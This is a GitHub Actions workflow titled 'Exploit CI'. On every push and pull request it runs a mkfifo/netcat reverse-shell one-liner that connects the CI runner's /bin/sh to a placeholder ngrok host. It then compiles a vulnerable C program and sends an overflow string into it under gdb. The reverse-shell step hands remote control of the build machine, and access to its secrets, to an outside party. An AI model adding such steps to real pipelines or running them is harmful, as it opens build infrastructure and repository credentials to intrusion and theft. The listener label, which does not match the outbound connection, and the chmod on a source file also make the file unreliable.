name: Exploit CI

on:
  push:
    branches:
      - main
  pull_request:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: '3.8'

    - name: Install netcat
      run: sudo apt-get install -y netcat

    - name: Set up Reverse Shell Listener
      run: |
        mkfifo /tmp/f; nc <ngrok_tcp_url> 12345 < /tmp/f | /bin/sh > /tmp/f 2>&1 &
        sleep 5  # Give time for reverse shell to be established

    - name: Compile Vulnerable Program
      run: |
        chmod +x vulnerable.c
        gcc -g -o vulnerable vulnerable.c

    - name: Run Exploit with GDB
      run: |
        python3 -c 'print("A" * 500)' > input.txt
        gdb -batch -ex "run $(< input.txt)" -ex "backtrace" -ex "info registers" -ex "x/40x \$rsp" ./vulnerable

    - name: Analyze Core Dump (if any)
      if: failure()
      run: gdb -c core -ex "bt" -ex "quit"
